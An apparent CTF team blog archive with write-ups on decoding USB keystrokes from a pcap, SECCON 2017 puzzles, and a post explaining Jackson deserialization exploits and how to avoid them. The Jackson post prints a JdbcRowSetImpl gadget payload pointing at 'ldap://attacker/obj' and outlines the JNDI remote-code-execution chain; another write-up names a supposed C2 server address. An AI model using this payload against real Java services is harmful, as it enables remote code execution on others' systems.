Solution to nc3 Klikkety Klack

18/12/17 — capitol

acab

name:

Klikkety Klack

category:

various

points:

n/a

Writeup

The danish police are running a CTF in order to show that they are cool with the kids here.

We got a pcapng file that seems to contain communication between an usb keyboard of type HP Basic USB Keyboard KU-0316 Keyboard and a computer.

Some simple awk and python did the trick, first get byte number three from the usb capture data like this:

tshark -r /tmp/2.pcapng -T fields -e usb.capdata|awk -F':' '{print($3)}'|awk 'NF > 0' > data.txt

and then translate it to characters with this python program:

mappings = {
        0x04:"A",
        0x05:"B",
        0x06:"C",
        0x07:"D",
        0x08:"E",
        0x09:"F",
        0x0A:"G",
        0x0B:"H",
        0x0C:"I",
        0x0D:"J",
        0x0E:"K",
        0x0F:"L",
        0x10:"M",
        0x11:"N",
        0x12:"O",
        0x13:"P",
        0x14:"Q",
        0x15:"R",
        0x16:"S",
        0x17:"T",
        0x18:"U",
        0x19:"V",
        0x1A:"W",
        0x1B:"X",
        0x1C:"Y",
        0x1D:"Z",
        0x1E:"1",
        0x1F:"2",
        0x20:"3",
        0x21:"4",
        0x22:"5",
        0x23:"6",
        0x24:"7",
        0x25:"8",
        0x26:"9",
        0x27:"0",
        0x28:"\n",
        0x2C:" ",
        0x2D:"-",
        0x2E:"=",
        0x2F:"[",
        0x30:"]"
        }
 
nums = []
keys = open('data.txt')
for line in keys:
        nums.append(int(line.strip(),16))
keys.close()
 
output = ""
for n in nums:
        if n in mappings:
                output += mappings[n]
        else:
                output += 'x'
 
print 'output :' + output

That gave us the output:

output: xJxxEEGx xHxAARR xLxIIGGEx xTTEESSTxEETx xMxIINx xTxOxAxSxTTEERxMxAxLLWWAxRREx 
xOxGx xIINNGGEENN xAxNxTxIxVxIIRxUUSx xDxExTTExCxTxEERRExDxEx xDDExNxx1xx xxFxxExDxTx 
xMxAxNxxx xxDxxExNx xHxAARx xSxHxAxxx2x556x 
x4x2xCx3xDx3xBxAx5xCx0x9x9x1x0x6xFxCx2x1xAxBx5x3x9x0x8x4x9x5xDx5xExFx2xFxFx9xFxCxAxAx8x9x0xBx1xCx7xExFx4x3x8x6xBxCx0x8x9x3xFx2xFxxxxxxxFx2xFx

Checking the hash 42C3D3BA5C099106FC21AB53908495D5EF2FF9FCAA890B1C7EF4386BC0893F2F on virustotal.com we found this comment:

This evil malware that infected my toaster made a call to 45.63.119.180 on port 9999 and send the text "HELLO". I think that server is a C2-server.

Connecting to that ip/port gave us another link, where we could download a binary

running strings on that binary gave us something that looked like an url:

nc3ctffqH
qn5ozfjyH
.onion/

and the string: 23/09/90 kl. 01:12:12 UTC er det helt rigtige unix-tidspunkt til at skabe en URL

after decompiling the binary the important part was this:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  unsigned int v3; // eax@1
  int v4; // ST0C_4@1
  int result; // eax@1
  __int64 v6; // rsi@1
  __int64 v7; // [sp+10h] [bp-70h]@1
  __int64 v8; // [sp+18h] [bp-68h]@1
  __int64 v9; // [sp+20h] [bp-60h]@1
  char v10; // [sp+28h] [bp-58h]@1
  __int16 v11; // [sp+68h] [bp-18h]@1
  __int64 v12; // [sp+78h] [bp-8h]@1

  v12 = *MK_FP(__FS__, 40LL);
  v3 = time(0LL);
  srand(v3);
  v4 = rand();
  v7 = 8171331223976895342LL;
  v8 = 8748917902158425713LL;
  v9 = 13350748694671150LL;
  memset(&v10, 0, 0x40uLL);
  v11 = 0;
  puts("23/09/90 kl. 01:12:12 UTC er det helt rigtige unix-tidspunkt til at skabe en URL");
  printf("%s%d\n", &v7, (unsigned int)v4);
  result = 0;
  v6 = *MK_FP(__FS__, 40LL) ^ v12;
  return result;
}

We changed the init of srand to be the epoch of the date in the string, and got this url.

That gave us the flag:

DO_IT_FOR_THIS_ADORABLE_LITTLE_PUPPY_LOOK_AT_THE_PUPPY_MARGE

Jackson deserialization exploits

15/12/17 — capitol

serialize

Earlier this year there was an remote execution exploit published against apache camel. Lets look at how that vulnerability works and how to guard against it.

First some background, apache camel is a framework that helps with building integrations between different components in a system. You can for example read from an jms queue and write to a https endpoint, very enterprise.

The exploitable part was in the jackson library that camel used to serialize/deserialize.

The vulnerability in jackson can be demonstrated with just a few lines of java code:

    String json = "[\"java.util.List\", [[\"com.sun.rowset.JdbcRowSetImpl\" ,{\n" +
            "\"dataSourceName\":\n" +
            "\"ldap://attacker/obj\" ,\n" +
            "\"autoCommit\" : true\n" +
            "}]]]";

    ObjectMapper om = new ObjectMapper();
    om.enableDefaultTyping();
    Object o = om.readValue(json, List.class);

Running it gives the error:

Exception in thread "main" com.fasterxml.jackson.databind.JsonMappingException: JdbcRowSet (anslut) JNDI kan inte anslutas
 at [Source: ["java.util.List", [["com.sun.rowset.JdbcRowSetImpl" ,{
"dataSourceName":
"ldap://attacker/obj" ,
"autoCommit" : true
}]]]; line: 4, column: 16] (through reference chain: java.util.ArrayList[0]->com.sun.rowset.JdbcRowSetImpl["autoCommit"])
	at com.fasterxml.jackson.databind.JsonMappingException.from(JsonMappingException.java:223)
	at com.fasterxml.jackson.databind.deser.SettableBeanProperty._throwAsIOE(SettableBeanProperty.java:537)
	at com.fasterxml.jackson.databind.deser.SettableBeanProperty._throwAsIOE(SettableBeanProperty.java:518)
	at com.fasterxml.jackson.databind.deser.impl.MethodProperty.deserializeAndSet(MethodProperty.java:99)
	at com.fasterxml.jackson.databind.deser.BeanDeserializer.vanillaDeserialize(BeanDeserializer.java:260)
	at com.fasterxml.jackson.databind.deser.BeanDeserializer.deserialize(BeanDeserializer.java:125)
	at com.fasterxml.jackson.databind.jsontype.impl.AsArrayTypeDeserializer._deserialize(AsArrayTypeDeserializer.java:110)
	at com.fasterxml.jackson.databind.jsontype.impl.AsArrayTypeDeserializer.deserializeTypedFromAny(AsArrayTypeDeserializer.java:68)
	at com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla.deserializeWithType(UntypedObjectDeserializer.java:554)
	at com.fasterxml.jackson.databind.deser.std.CollectionDeserializer.deserialize(CollectionDeserializer.java:279)
	at com.fasterxml.jackson.databind.deser.std.CollectionDeserializer.deserialize(CollectionDeserializer.java:249)
	at com.fasterxml.jackson.databind.deser.std.CollectionDeserializer.deserialize(CollectionDeserializer.java:26)
	at com.fasterxml.jackson.databind.jsontype.impl.AsArrayTypeDeserializer._deserialize(AsArrayTypeDeserializer.java:110)
	at com.fasterxml.jackson.databind.jsontype.impl.AsArrayTypeDeserializer.deserializeTypedFromArray(AsArrayTypeDeserializer.java:50)
	at com.fasterxml.jackson.databind.deser.std.CollectionDeserializer.deserializeWithType(CollectionDeserializer.java:310)
	at com.fasterxml.jackson.databind.deser.impl.TypeWrappedDeserializer.deserialize(TypeWrappedDeserializer.java:42)
	at com.fasterxml.jackson.databind.ObjectMapper._readMapAndClose(ObjectMapper.java:3788)
	at com.fasterxml.jackson.databind.ObjectMapper.readValue(ObjectMapper.java:2779)
	at no.hackeriet.App.main(App.java:23)
Caused by: java.sql.SQLException: JdbcRowSet (anslut) JNDI kan inte anslutas
	at com.sun.rowset.JdbcRowSetImpl.connect(JdbcRowSetImpl.java:634)
	at com.sun.rowset.JdbcRowSetImpl.setAutoCommit(JdbcRowSetImpl.java:4067)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at com.fasterxml.jackson.databind.deser.impl.MethodProperty.deserializeAndSet(MethodProperty.java:97)
	... 15 more

There is a type check in the readValue class, but that doesn’t stop the attack since it only checks that it’s a List that we try to deserialize, and the content of the list isn’t type checked due to type erasure.

The reason that jackson lets the sender specify the java classes that’s the json gets deserialized to is because of the call om.enableDefaultTyping();. The same functionality can also be triggered if you have annotated a java.lang.Object with @JsonTypeInfo.

If you don’t do that in your code then you are safe from this attack.

Gadgets

The classes that we can use to escalate an deserialization into remote code execution are called gadgets.

More modern versions of jackson have a blacklist with known dangerous classes that it refuses to deserialize here.

But there is a large number of java classes out there and it’s impossible to defend against all of them.

In order for a class to be a valid gadget for a jackson deserialization attack these criteria needs to be fulfilled:

  • A default constructor, i.e. a constructor without any arguments.
  • A method that acts on the argument in a non-trivial way, the simplest is if you are able to provide a serialized java class with a function that gets called. But there is a number of other ways, for example using jndi connections.

The LDAP gadget

For those that ain’t that deep into the java world, a quick description of JNDI is this: JNDI does for LDAP what JDBC does for a Database, in other words it provides an interface to interact with the ldap server from java.

How the ldap url leads to remote code execution a bit out of scope but is described here.

To summarize the attack have these steps:

  1. Attacker provides an absolute LDAP URL to a vulnerable JNDI lookup method.
  2. Target connect’s to an attacker controlled LDAP Server that returns a malicious JNDI Reference.
  3. Target decodes the JNDI Reference.
  4. Target fetches the Factory class from attacker-controlled server.
  5. Target instantiates the Factory class.
  6. Payload gets executed.

Solution to SECCON 2017 putchar Music

13/12/17 — capitol

rebels

name:

putchar music

category:

programming

points:

100

Writeup

We got a one liner c program and where asked to find the movie title, after adding include lines it looked like this

#include <stdio.h>
#include <math.h>

main(t,i,j){unsigned char p[]="###<f_YM\204g_YM\204g_Y_H #<f_YM\204g_YM\204g_Y_H #+-?[WKAMYJ/7 #+-?[WKgH #+-?[WKAMYJ/7hk\206\203tk\\YJAfkkk";
for(i=0;t=1;i=(i+1)%(sizeof(p)-1)){double x=pow(1.05946309435931,p[i]/6+13);for(j=1+p[i]%6;t++%(8192/j);)
putchar(t>>5|(int)(t*x));}}

We compiled it with:

gcc putchar.c -lm

And when we can the program it produced a lot of random output in intervals, so we piped it to the sound card with:

./a.out | padsp tee /dev/audio > /dev/null

That produced beautiful music and we are thinking about converting all our mp3s to C now.

flag was SECCON{STAR_WARS}

Solution to SECCON 2017 Run Me!

12/12/17 — capitol

fibonacci

name:

Run Me!

category:

programming

points:

100

Writeup

We got a small python program that calculated a number and printed the flag.

import sys
sys.setrecursionlimit(99999)
def f(n):
    return n if n < 2 else f(n-2) + f(n-1)
print "SECCON{" + str(f(11011))[:32] + "}"

Only problem was that it was pretty slow. Looking at the function f, it became clear that it was a recursive implementation of a fibonacci number calculator.

We can simplify the program by pre-calculating the number, since the input 11011 is static. This is a good resource for doing math online. That gives us the program:

print "SECCON{" + str(650761408323317176677727615418728824035834139276098998490249192132666758545760517800054917034155243927170284032856159641073239445267259027201529090078896791094491606651280986273375358475762477790432186275595009347181655230560612893072010176744437899125794062096822499169737341076562268978822309439778493884517811269755645677051823939101818750862488649336629337157213652909313926271909722579127327516034001078889493903847162940951919936666981110589496109534874704781719109928400031417346568159901873387957504386076864598280589140560720555215586103334108606666557885182543411057646507987554088958465040914897691939542285281414546306123632401776970176802858533764858159120251846344138169520194579452006975065591700295752709436626337896977143749517364692359205470520308998499747373023079909096931930849470838600436193492730120598058390332468715098569506803288748815104425904241644846838395455904535450056833234799685571736399955768131656445051569947468596781842534517197721000873495062895837282533156293369623617362342118583768869069357254102738089664559884034222599617271201387495056590015984399482556187470258510628428546129648977633092532344658489593547730850249245718744514953339799649429008307017831938762015220771469692523759803441301822573457181350382636976785308875676049259482221646051841764952498511738390807032009076345712915067307334601511409483180854512241289677598260345859220604188459466566218428522712526307485414327912984814200699366287893779866533195964875622418194229718474283906639970274067803465246049255487228512317014925146357266424154230175016287402954010234339299976926358623916935423402962510413409907048690682619724213875769975891654986212343055742766929242325603302953851160284942626779251037312496874310855130377517889541404945838665610608950717555040757378177019719117615549280661866187332498803134726445107694994290546795927294081948416543673731399120512192375688817905543314233147723782998209741461558386215456190659067634677870007289790910629423072714321397319111715970130151174669992797276293445539760861617336440030158167771970869191088140343413881822920781894388333124029339099939263144538805634147654202831717365638267529461536461367917300661565377015525846611173849663494461429041123993952629470445363197932541803303152120627201578910609457626560492171665716942761589)[:32] + "}"

flag was SECCON{65076140832331717667772761541872}

Solution to SECCON 2017 Log Search

11/12/17 — capitol

logs

name:

Log search

category:

web

points:

100

Writeup

We go a link to an empty site with the words “Find the flag!”.

Looking at the source we found a link to another page.

That was a search page for accesses to the webpage. Searching for flag gave us this url: http://logsearch.pwn.seccon.jp/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt

flag was SECCON{N0SQL_1njection_for_Elasticsearch!}